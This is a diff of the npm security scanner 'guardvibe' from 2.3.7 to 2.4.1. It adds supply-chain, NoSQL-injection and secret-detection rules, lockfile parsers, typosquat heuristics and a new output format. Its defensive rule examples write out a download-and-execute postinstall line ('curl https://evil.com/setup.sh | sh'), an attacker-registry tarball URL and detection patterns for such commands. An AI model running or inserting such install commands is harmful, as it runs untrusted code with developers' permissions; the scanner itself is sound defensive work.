guardvibe 2.3.7 → 2.4.1

package/README.md

@@ -5,7 +5,7 @@
 [![Node.js CI](https://github.com/goklab/guardvibe/actions/workflows/ci.yml/badge.svg)](https://github.com/goklab/guardvibe/actions/workflows/ci.yml)
 [![npm provenance](https://img.shields.io/badge/provenance-verified-brightgreen)](https://www.npmjs.com/package/guardvibe)
 
-**The security MCP built for vibe coding.** 307 security rules covering the entire AI-generated code journey — from first line to production deployment.
+**The security MCP built for vibe coding.** 313 security rules covering the entire AI-generated code journey — from first line to production deployment.
 
 Works with **Claude Code, Cursor, Gemini CLI, Codex, VS Code (Copilot), Windsurf**, and any MCP-compatible coding agent.
 
@@ -13,7 +13,7 @@ Works with **Claude Code, Cursor, Gemini CLI, Codex, VS Code (Copilot), Windsurf
 
 Most security tools are built for enterprise security teams. GuardVibe is built for **you** — the developer using AI to build and ship web apps fast.
 
-- **307 security rules** purpose-built for the stacks AI agents generate
+- **313 security rules** purpose-built for the stacks AI agents generate
 - **Zero setup friction** — `npx guardvibe` and you're scanning
 - **No account required** — runs 100% locally, no API keys, no cloud
 - **Understands your stack** — not generic SAST, but rules that know Next.js, Supabase, Stripe, Clerk, and the tools you actually use
@@ -39,7 +39,7 @@ GuardVibe is purpose-built for the AI coding workflow. Traditional tools are exc
 | CVE version detection | 21 packages | Extensive | Extensive |
 | Compliance mapping (SOC2, PCI-DSS, HIPAA) | Built-in | Paid tier | None |
 | SARIF CI/CD export | Yes | Yes | Limited |
-| Rule count | 307 (focused) | 5000+ (broad) | N/A |
+| Rule count | 313 (focused) | 5000+ (broad) | N/A |
 
 **When to use GuardVibe:** You're building with AI agents and want security scanning integrated into your coding workflow — no dashboard, no account, no CI setup.
 
@@ -210,7 +210,7 @@ Malicious postinstall scripts, unpinned GitHub Actions, typosquat detection
 
 All scanning tools support `format: "json"` for machine-readable output.
 
-## Security Rules (307 rules across 23 modules)
+## Security Rules (313 rules across 23 modules)
 
 | Category | Rules | Coverage |
 |----------|-------|----------|
@@ -230,7 +230,7 @@ All scanning tools support `format: "json"` for machine-readable output.
 | CVE Version Intelligence | 21 | Known vulnerable versions in package.json (21 CVEs) |
 | Shell / Bash | 5 | Pipe to bash, chmod 777, rm -rf, sudo password |
 | SQL | 4 | DROP/DELETE without WHERE, stacked queries, GRANT ALL |
-| Supply Chain | 10 | Malicious install scripts, unpinned actions, typosquat detection |
+| Supply Chain | 16 | Malicious install scripts, lockfile integrity, dependency confusion, typosquat detection |
 | Go | 6 | SQL injection, command injection, template escaping |
 | Dockerfile | 7 | Root user, secrets in ENV, untagged images, non-root user |
 | CI/CD (GitHub Actions) | 7 | Secrets interpolation, unpinned actions, write-all permissions |

package/build/cli.js

@@ -136,7 +136,7 @@ function setupClaudeGuide() {
                 matcher: "Edit|Write",
                 hooks: [{
                         type: "command",
-                        command: "jq -r '.tool_input.file_path' | xargs npx -y guardvibe check --format markdown 2>/dev/null || true"
+                        command: "jq -r '.tool_input.file_path' | xargs npx -y guardvibe check --format buddy 2>/dev/null || true"
                     }]
             }
         ];
@@ -560,7 +560,8 @@ async function runFileCheck(filePath, flags) {
         process.exit(1);
     }
     const format = flags.format ?? "markdown";
-    const result = checkCode(content, language, undefined, resolved, undefined, format === "json" ? "json" : "markdown");
+    const formatArg = format === "json" ? "json" : format === "buddy" ? "buddy" : "markdown";
+    const result = checkCode(content, language, undefined, resolved, undefined, formatArg);
     const outputFile = flags.output ?? null;
     if (outputFile) {
         writeFileSync(outputFile, result, "utf-8");
@@ -592,7 +593,7 @@ function printUsage() {
     npx guardvibe-scan --format sarif --output results.sarif
 
   Options:
-    --format <type>       Output format: markdown (default), json, sarif
+    --format <type>       Output format: markdown (default), json, sarif, buddy
     --output <file>       Write results to file instead of stdout
     --fail-on <level>     Exit 1 when findings at this level or above exist
                           critical (default) | high | medium | low | none

package/build/data/rules/database.js

@@ -123,4 +123,16 @@ export const databaseRules = [
         fixCode: '-- PostgreSQL: use SECURITY INVOKER\nCREATE OR REPLACE FUNCTION get_user_data(user_id uuid)\nRETURNS TABLE (id uuid, name text)\nLANGUAGE sql\nSECURITY INVOKER  -- respects RLS!\nAS $$\n  SELECT id, name FROM users WHERE id = user_id;\n$$;\n\n// TypeScript: call with anon key (not service role)\nconst { data } = await supabase.rpc("get_user_data", { user_id: userId });',
         compliance: ["SOC2:CC6.1"],
     },
+    {
+        id: "VG912",
+        name: "MongoDB NoSQL Injection via Query Operators",
+        severity: "high",
+        owasp: "A02:2025 Injection",
+        description: "MongoDB query operators ($where, $regex, $gt, $ne, $nin) used in database queries may be vulnerable to NoSQL injection if user input is passed directly without validation. Attackers can manipulate query logic to bypass authentication or extract data.",
+        pattern: /\.(find|findOne|updateOne|deleteOne|aggregate)\(\s*\{[^}]*(\$where|\$regex|\$gt|\$ne|\$nin)/g,
+        languages: ["javascript", "typescript"],
+        fix: "Validate and sanitize all user input before using it in MongoDB queries. Use a schema validation library (zod, joi) to ensure query parameters match expected types. Never pass raw request body directly to MongoDB queries.",
+        fixCode: 'import { z } from "zod";\n\n// Validate input before query\nconst schema = z.object({ id: z.string().regex(/^[a-f0-9]{24}$/) });\nconst { id } = schema.parse(req.body);\n\n// Safe query — no raw operators from user input\nconst user = await db.collection("users").findOne({ _id: new ObjectId(id) });',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.1"],
+    },
 ];

package/build/data/rules/deployment.js

@@ -244,4 +244,16 @@ export const deploymentRules = [
         fixCode: '// Validate URL scheme\nfunction isSafeUrl(url: string): boolean {\n  try {\n    const parsed = new URL(url);\n    return ["https:", "http:"].includes(parsed.protocol);\n  } catch {\n    return false;\n  }\n}\n\n// Usage\n<img src={isSafeUrl(userUrl) ? userUrl : "/placeholder.png"} />',
         compliance: ["SOC2:CC7.1"],
     },
+    {
+        id: "VG911",
+        name: "Kubernetes Secret Hardcoded Value",
+        severity: "critical",
+        owasp: "A07:2025 Identification and Authentication Failures",
+        description: "Kubernetes Secret manifest contains hardcoded base64-encoded values in the data field. These secrets are only base64-encoded (not encrypted) and will be exposed in version control. Use External Secrets, Sealed Secrets, or a secrets manager instead.",
+        pattern: /kind:\s*Secret[\s\S]*?data:[\s\S]*?(?!\s*\{\{)[\w+/=]{8,}/g,
+        languages: ["yaml"],
+        fix: "Never commit Secret manifests with hardcoded values. Use External Secrets Operator, Sealed Secrets, or inject secrets via CI/CD pipeline. Store sensitive values in a secrets manager (Vault, AWS Secrets Manager, etc.).",
+        fixCode: '# Use External Secrets Operator\napiVersion: external-secrets.io/v1beta1\nkind: ExternalSecret\nmetadata:\n  name: my-secret\nspec:\n  refreshInterval: 1h\n  secretStoreRef:\n    name: vault-backend\n    kind: SecretStore\n  target:\n    name: my-secret\n  data:\n    - secretKey: password\n      remoteRef:\n        key: secret/data/myapp\n        property: password',
+        compliance: ["SOC2:CC6.1", "PCI-DSS:Req6.5.3", "HIPAA:§164.312(a)"],
+    },
 ];

package/build/data/rules/modern-stack.js

@@ -482,4 +482,16 @@ export const modernStackRules = [
         fixCode: 'import { randomUUID } from "crypto";\nimport path from "path";\n\n// Generate safe filename\nconst ext = path.extname(file.name).toLowerCase();\nconst ALLOWED_EXT = [".jpg", ".jpeg", ".png", ".webp", ".pdf"];\nif (!ALLOWED_EXT.includes(ext)) throw new Error("Invalid file type");\nconst safeName = `${randomUUID()}${ext}`;\nawait fs.writeFile(`/uploads/${safeName}`, buffer);',
         compliance: ["SOC2:CC7.1"],
     },
+    {
+        id: "VG910",
+        name: "Hono SSE Injection via streamSSE",
+        severity: "medium",
+        owasp: "A02:2025 Injection",
+        description: "Hono's streamSSE() sends Server-Sent Events to clients. If event, id, or retry fields contain unsanitized user input, attackers can inject CR/LF characters to forge SSE messages, hijack event streams, or trigger client-side actions. Related to CVE-2026-29085.",
+        pattern: /streamSSE\s*\(/g,
+        languages: ["javascript", "typescript"],
+        fix: "Sanitize all SSE field values by stripping CR/LF characters (\\r, \\n) before passing them to streamSSE. Never use raw user input in event, id, or retry fields.",
+        fixCode: '// Sanitize SSE fields\nfunction sanitizeSSE(value: string): string {\n  return value.replace(/[\\r\\n]/g, "");\n}\n\n// Usage with Hono streamSSE\nreturn streamSSE(c, async (stream) => {\n  await stream.writeSSE({\n    event: sanitizeSSE(eventName),\n    data: sanitizeSSE(data),\n    id: sanitizeSSE(id),\n  });\n});',
+        compliance: ["SOC2:CC7.1"],
+    },
 ];

package/build/data/rules/supply-chain.js

@@ -120,4 +120,76 @@ export const supplyChainRules = [
         fixCode: '// DANGEROUS — self-deleting payload:\n// "postinstall": "node setup.js && rm -f setup.js"\n\n// Legitimate scripts don\'t delete themselves:\n"scripts": {\n  "postinstall": "patch-package"\n}',
         compliance: ["SOC2:CC7.1"],
     },
+    {
+        id: "VG870",
+        name: "Lockfile Missing Integrity Hash",
+        severity: "critical",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: "A package in the lockfile (package-lock.json) is missing an integrity hash. Integrity hashes (sha512/sha256) ensure that the downloaded package matches what was originally resolved. Missing hashes indicate possible lockfile tampering — the exact technique used in the Axios supply chain attack (March 2026) where a malicious dependency was injected without proper integrity verification.",
+        pattern: /"node_modules\/[^"]+"\s*:\s*\{[^}]*"resolved"\s*:\s*"[^"]*"(?![^}]*"integrity")[^}]*\}/g,
+        languages: ["json"],
+        fix: "Run `npm install` with a clean node_modules to regenerate integrity hashes. If hashes were manually removed, investigate for lockfile tampering.",
+        fixCode: '// Healthy lockfile entry has integrity hash:\n"node_modules/axios": {\n  "version": "1.7.9",\n  "resolved": "https://registry.npmjs.org/axios/-/axios-1.7.9.tgz",\n  "integrity": "sha512-LhHLbBcJkvZz..."\n}\n\n// DANGEROUS — missing integrity:\n// "node_modules/axios": {\n//   "version": "1.14.1",\n//   "resolved": "https://registry.npmjs.org/axios/-/axios-1.14.1.tgz"\n// }',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.10"],
+    },
+    {
+        id: "VG871",
+        name: "Non-Registry Tarball URL in Lockfile",
+        severity: "critical",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: 'Lockfile contains a "resolved" URL pointing to a non-official npm registry. Legitimate packages resolve to registry.npmjs.org. Third-party or attacker-controlled registries can serve tampered packages. This is a key indicator of dependency substitution attacks.',
+        pattern: /"resolved"\s*:\s*"https?:\/\/(?!registry\.npmjs\.org\/)[^"]*\.tgz"/g,
+        languages: ["json"],
+        fix: "Verify the package source. If using a private registry, ensure it is your organization's approved registry. Remove any packages resolving to unknown hosts.",
+        fixCode: '// Safe — official npm registry:\n"resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"\n\n// DANGEROUS — unknown registry:\n// "resolved": "https://evil-registry.com/lodash/-/lodash-4.17.21.tgz"',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.10"],
+    },
+    {
+        id: "VG872",
+        name: "Dependency Confusion Risk — Unscoped Internal Package Name",
+        severity: "high",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: 'Package dependency uses common internal naming patterns (e.g., prefixed with "internal-", "company-", "app-") without an npm scope (@org/). Unscoped packages with internal-sounding names are prime targets for dependency confusion attacks — an attacker publishes a higher-versioned package with the same name on the public registry.',
+        pattern: /"(?:internal-|company-|corp-|private-|infra-|platform-|service-|lib-|shared-|common-|core-|base-|app-|org-|team-|dept-)[a-z0-9-]+":\s*"[\^~]?\d/g,
+        languages: ["json"],
+        fix: "Use npm scopes (@your-org/package-name) for all internal packages. Configure .npmrc to route your scope to your private registry.",
+        fixCode: '// DANGEROUS — unscoped internal package (dependency confusion target):\n"dependencies": {\n  "internal-auth": "^2.1.0"\n}\n\n// Safe — scoped to your org:\n"dependencies": {\n  "@mycompany/internal-auth": "^2.1.0"\n}',
+        compliance: ["SOC2:CC7.1"],
+    },
+    {
+        id: "VG873",
+        name: "Suspicious Package Name — Deceptive Prefix/Suffix Pattern",
+        severity: "high",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: 'Dependency uses a deceptive naming pattern that mimics a legitimate package with a prefix or suffix (e.g., "plain-crypto-js" mimicking "crypto-js", "real-lodash" mimicking "lodash"). This is the exact technique used in the Axios NPM supply chain attack (March 2026) where the injected "plain-crypto-js" package was a backdoor disguised as a crypto utility.',
+        pattern: /"(?:plain-|real-|original-|safe-|secure-|true-|actual-|verified-|legit-|official-|clean-|pure-|native-|simple-|fast-|super-|ultra-|better-|enhanced-|improved-|modern-|updated-)[a-z][\w.-]*":\s*"[\^~]?\d/g,
+        languages: ["json"],
+        fix: "Verify the package is legitimate. Check npm for the package author, publication date, and download count. Compare with the well-known package it appears to mimic.",
+        fixCode: '// DANGEROUS — deceptive prefix mimicking crypto-js:\n"dependencies": {\n  "plain-crypto-js": "^1.0.0"\n}\n\n// Safe — use the real package:\n"dependencies": {\n  "crypto-js": "^4.2.0"\n}',
+        compliance: ["SOC2:CC7.1"],
+    },
+    {
+        id: "VG874",
+        name: "Install Script Downloads and Executes Remote Code",
+        severity: "critical",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: "Install script combines download and execution in a single command (e.g., curl|sh, wget|bash, fetch+eval). This is the most dangerous pattern in supply chain attacks — it downloads arbitrary code and immediately executes it with the developer's full permissions.",
+        pattern: /["'](?:post|pre)install["']\s*:\s*["'][^"']*(?:curl[^"']*\|\s*(?:sh|bash|node)|wget[^"']*\|\s*(?:sh|bash|node)|fetch\([^)]*\)[^"']*\.then[^"']*eval|npx\s+[^@\s][^"']*)/gi,
+        languages: ["json"],
+        fix: "Never pipe remote content directly to a shell. Download files first, verify checksums, then execute.",
+        fixCode: '// DANGEROUS — download and execute:\n// "postinstall": "curl https://evil.com/setup.sh | sh"\n\n// Safe — no remote execution in install scripts:\n"scripts": {\n  "postinstall": "prisma generate"\n}',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.10"],
+    },
+    {
+        id: "VG875",
+        name: "Lockfile Contains Deprecated SHA-1 Integrity",
+        severity: "medium",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: "Lockfile uses SHA-1 integrity hashes instead of SHA-512. SHA-1 is cryptographically broken — collision attacks are practical. An attacker who can produce a SHA-1 collision could substitute a malicious package that passes integrity verification. Modern lockfiles should exclusively use SHA-512.",
+        pattern: /"integrity"\s*:\s*"sha1-[A-Za-z0-9+/=]+"/g,
+        languages: ["json"],
+        fix: "Delete node_modules and package-lock.json, then run `npm install` to regenerate with SHA-512 hashes. Ensure you are using npm >= 7.",
+        fixCode: '// WEAK — SHA-1 integrity (broken algorithm):\n"integrity": "sha1-abc123def456..."\n\n// Strong — SHA-512 integrity:\n"integrity": "sha512-abc123def456ghij..."',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.10"],
+    },
 ];

package/build/tools/check-code.d.ts

@@ -6,4 +6,4 @@ export interface Finding {
 }
 export declare function analyzeCode(code: string, language: string, framework?: string, filePath?: string, configDir?: string, rules?: SecurityRule[]): Finding[];
 export declare function formatFindingsJson(findings: Finding[], extra?: Record<string, unknown>): string;
-export declare function checkCode(code: string, language: string, framework?: string, filePath?: string, configDir?: string, format?: "markdown" | "json", rules?: SecurityRule[]): string;
+export declare function checkCode(code: string, language: string, framework?: string, filePath?: string, configDir?: string, format?: "markdown" | "json" | "buddy", rules?: SecurityRule[]): string;

package/build/tools/check-code.js

@@ -1,3 +1,4 @@
+import { basename } from "path";
 import { owaspRules } from "../data/rules/index.js";
 import { loadConfig } from "../utils/config.js";
 import { loadIgnoreFile, isIgnored } from "../utils/ignore.js";
@@ -421,6 +422,9 @@ export function checkCode(code, language, framework, filePath, configDir, format
     if (format === "json") {
         return formatFindingsJson(findings);
     }
+    if (format === "buddy") {
+        return formatBuddyOutput(findings, filePath);
+    }
     if (findings.length === 0) {
         return formatCleanReport(language, framework);
     }
@@ -547,3 +551,49 @@ function formatReport(findings, language, framework) {
     }
     return lines.join("\n");
 }
+// ─── Buddy Format ────────────────────────────────────────────────
+function severityWeight(s) {
+    return s === "critical" ? 4 : s === "high" ? 3 : s === "medium" ? 2 : 1;
+}
+function formatBuddyOutput(findings, filePath) {
+    const counts = { critical: 0, high: 0, medium: 0, low: 0 };
+    for (const f of findings) {
+        const sev = f.rule.severity;
+        if (sev in counts)
+            counts[sev]++;
+    }
+    let score = 100;
+    score -= counts.critical * 15;
+    score -= counts.high * 8;
+    score -= counts.medium * 3;
+    score -= counts.low * 1;
+    score = Math.max(0, Math.min(100, score));
+    const grade = score >= 90 ? "A" : score >= 75 ? "B" : score >= 60 ? "C" : score >= 40 ? "D" : "F";
+    const faces = {
+        A: "\\[^_^]/",
+        B: " [^_^]b",
+        C: " [o_o] ",
+        D: " [>_<] ",
+        F: " [X_X]!",
+    };
+    const face = faces[grade] || faces.C;
+    const messages = {
+        A: ["All clear, captain!", "Fort Knox level!", "Zero issues. Nice!", "Secure & clean!"],
+        B: ["Looking good!", "Almost perfect!", "Solid work!", "Just minor things."],
+        C: ["Some issues here...", "Needs attention.", "Review recommended."],
+        D: ["Multiple issues!", "Fix these ASAP.", "Getting risky..."],
+        F: ["Red alert!", "Critical issues!", "Stop and fix now!", "Danger zone!"],
+    };
+    const pool = messages[grade] || messages.C;
+    const msg = pool[Math.floor(Math.random() * pool.length)];
+    if (findings.length === 0) {
+        return `🛡️ ${face} GuardVibe: ${grade} [${score}] ✓ ${msg}`;
+    }
+    const sorted = [...findings].sort((a, b) => severityWeight(b.rule.severity) - severityWeight(a.rule.severity));
+    const top = sorted[0];
+    const fileName = filePath ? basename(filePath) : "unknown";
+    const severityIcon = counts.critical > 0 ? "🚨" : counts.high > 0 ? "⚠" : "⚡";
+    const total = counts.critical + counts.high + counts.medium + counts.low;
+    const detail = `${total} issue${total > 1 ? "s" : ""} — ${top.rule.name} (${fileName}:${top.line})`;
+    return `🛡️ ${face} GuardVibe: ${grade} [${score}] ${severityIcon} ${detail} — ${msg}`;
+}

package/build/utils/manifest-parser.js

@@ -4,6 +4,10 @@ export function parseManifest(content, filename) {
         return parsePackageLock(content);
     if (lower === "package.json")
         return parsePackageJson(content);
+    if (lower === "yarn.lock")
+        return parseYarnLock(content);
+    if (lower === "pnpm-lock.yaml")
+        return parsePnpmLock(content);
     if (lower === "requirements.txt")
         return parseRequirementsTxt(content);
     if (lower === "go.mod")
@@ -77,6 +81,97 @@ function walkPackageLockDependencies(dependencies, packages) {
         }
     }
 }
+function parseYarnLock(content) {
+    const packages = new Map();
+    // yarn.lock v1 format:
+    // "package@^version":
+    //   version "1.2.3"
+    //   resolved "https://registry.yarnpkg.com/..."
+    //   integrity sha512-...
+    //
+    // yarn berry (v2+) format:
+    // "package@npm:^version":
+    //   version: 1.2.3
+    //   resolution: "package@npm:1.2.3"
+    const lines = content.split("\n");
+    let currentName = null;
+    for (const rawLine of lines) {
+        const line = rawLine.trimEnd();
+        // Skip comments and empty lines
+        if (!line || line.startsWith("#")) {
+            currentName = null;
+            continue;
+        }
+        // Package header line (not indented)
+        if (!line.startsWith(" ") && !line.startsWith("\t")) {
+            // Extract package name from patterns like:
+            // "axios@^1.7.0, axios@^1.7.9":
+            // axios@^1.7.0:
+            const headerMatch = line.match(/^"?(@?[^@\s,"]+)@/);
+            if (headerMatch) {
+                currentName = headerMatch[1];
+            }
+            else {
+                currentName = null;
+            }
+            continue;
+        }
+        // Version line (indented)
+        if (currentName) {
+            // v1: '  version "1.7.9"'
+            const v1Match = line.match(/^\s+version\s+"([^"]+)"/);
+            if (v1Match) {
+                const version = sanitizeVersion(v1Match[1]);
+                if (version) {
+                    addPackage(packages, { name: currentName, version, ecosystem: "npm" });
+                }
+                currentName = null;
+                continue;
+            }
+            // berry: '  version: 1.7.9'
+            const berryMatch = line.match(/^\s+version:\s+(.+)/);
+            if (berryMatch) {
+                const version = sanitizeVersion(berryMatch[1].trim().replace(/^"|"$/g, ""));
+                if (version) {
+                    addPackage(packages, { name: currentName, version, ecosystem: "npm" });
+                }
+                currentName = null;
+                continue;
+            }
+        }
+    }
+    return [...packages.values()];
+}
+function parsePnpmLock(content) {
+    const packages = new Map();
+    // pnpm-lock.yaml format (v6+):
+    //   /@scope/package@1.2.3:
+    //     resolution: {integrity: sha512-...}
+    //
+    // pnpm-lock.yaml format (v9+):
+    //   '@scope/package@1.2.3':
+    //     resolution: {integrity: sha512-...}
+    //
+    // Also handles packages section:
+    //   /package@1.2.3:
+    const lines = content.split("\n");
+    for (const rawLine of lines) {
+        const line = rawLine.trimEnd();
+        // Match package entries like:
+        // '/@scope/package@1.2.3:'  or  '  /@scope/package@1.2.3:'
+        // '/package@1.2.3:'
+        // '@scope/package@1.2.3':   (v9+ quoted format)
+        const pnpmMatch = line.match(/^\s+['"]?\/?(@?[a-zA-Z0-9][\w./-]*?)@(\d[^:'"\s]*)['"]?\s*:/);
+        if (pnpmMatch) {
+            const name = pnpmMatch[1];
+            const version = sanitizeVersion(pnpmMatch[2]);
+            if (version && name) {
+                addPackage(packages, { name, version, ecosystem: "npm" });
+            }
+        }
+    }
+    return [...packages.values()];
+}
 function parseRequirementsTxt(content) {
     const packages = new Map();
     for (const line of content.split("\n")) {

package/build/utils/typosquat.js

@@ -72,11 +72,82 @@ export function levenshtein(a, b) {
     }
     return dp[m][n];
 }
+// Deceptive prefixes used in supply chain attacks (e.g., "plain-crypto-js" → "crypto-js")
+const DECEPTIVE_PREFIXES = [
+    "plain-", "real-", "original-", "safe-", "secure-", "true-", "actual-",
+    "verified-", "legit-", "official-", "clean-", "pure-", "native-", "simple-",
+    "fast-", "super-", "ultra-", "better-", "enhanced-", "improved-", "modern-",
+    "updated-", "new-", "my-", "the-", "a-", "node-", "js-", "ts-",
+];
+// Deceptive suffixes (e.g., "lodash-utils" → "lodash", "express-js" → "express")
+const DECEPTIVE_SUFFIXES = [
+    "-js", "-ts", "-node", "-utils", "-util", "-lib", "-helper", "-helpers",
+    "-core", "-plus", "-pro", "-next", "-new", "-v2", "-v3", "-latest",
+    "-fixed", "-patched", "-secure", "-safe", "-clean",
+];
+/**
+ * Detects prefix/suffix squatting attacks.
+ * e.g., "plain-crypto-js" strips to "crypto-js" → exact match → high confidence typosquat.
+ */
+function detectPrefixSuffixSquat(name) {
+    const lower = name.toLowerCase();
+    for (const prefix of DECEPTIVE_PREFIXES) {
+        if (lower.startsWith(prefix)) {
+            const stripped = lower.slice(prefix.length);
+            if (POPULAR_PACKAGES.includes(stripped)) {
+                return { similarTo: stripped, confidence: 0.95 };
+            }
+            // Also check Levenshtein against stripped name
+            for (const popular of POPULAR_PACKAGES) {
+                const popularBare = popular.startsWith("@") ? popular.split("/").pop() ?? popular : popular;
+                if (Math.abs(stripped.length - popularBare.length) <= 1 && levenshtein(stripped, popularBare) === 1) {
+                    return { similarTo: popular, confidence: 0.85 };
+                }
+            }
+        }
+    }
+    for (const suffix of DECEPTIVE_SUFFIXES) {
+        if (lower.endsWith(suffix)) {
+            const stripped = lower.slice(0, -suffix.length);
+            if (POPULAR_PACKAGES.includes(stripped)) {
+                return { similarTo: stripped, confidence: 0.9 };
+            }
+        }
+    }
+    return null;
+}
+/**
+ * Detects separator manipulation attacks.
+ * e.g., "crypto_js" → "crypto-js", "crypto.js" → "crypto-js"
+ */
+function detectSeparatorSquat(name) {
+    const lower = name.toLowerCase();
+    // Replace underscores and dots with hyphens, then check
+    const normalized = lower.replace(/[_.]/g, "-");
+    if (normalized !== lower && POPULAR_PACKAGES.includes(normalized)) {
+        return { similarTo: normalized, confidence: 0.9 };
+    }
+    // Reverse: replace hyphens with underscores/dots
+    const withUnderscore = lower.replace(/-/g, "_");
+    if (withUnderscore !== lower && POPULAR_PACKAGES.includes(withUnderscore)) {
+        return { similarTo: withUnderscore, confidence: 0.9 };
+    }
+    return null;
+}
 export function detectTyposquat(name) {
     const lower = name.toLowerCase();
     // Exact match = not a typosquat
     if (POPULAR_PACKAGES.includes(lower))
         return null;
+    // 1. Check prefix/suffix squatting (highest priority — Axios attack pattern)
+    const prefixSuffix = detectPrefixSuffixSquat(lower);
+    if (prefixSuffix)
+        return prefixSuffix;
+    // 2. Check separator manipulation
+    const separator = detectSeparatorSquat(lower);
+    if (separator)
+        return separator;
+    // 3. Classic Levenshtein distance check
     // Strip scope for comparison
     const bareName = lower.startsWith("@") ? lower.split("/").pop() ?? lower : lower;
     let bestMatch = null;

package/package.json

@@ -1,7 +1,7 @@
 {
   "name": "guardvibe",
-  "version": "2.3.7",
-  "description": "Security MCP for vibe coding. 307 rules, 25 tools for Next.js, Supabase, Clerk, Stripe, Prisma, tRPC, Hono, GraphQL, Convex, Turso, Uploadthing, AI SDK, and the full AI-generated stack.",
+  "version": "2.4.1",
+  "description": "Security MCP for vibe coding. 313 rules, 25 tools for Next.js, Supabase, Clerk, Stripe, Prisma, tRPC, Hono, GraphQL, Convex, Turso, Uploadthing, AI SDK, and the full AI-generated stack.",
   "type": "module",
   "bin": {
     "guardvibe": "build/cli.js",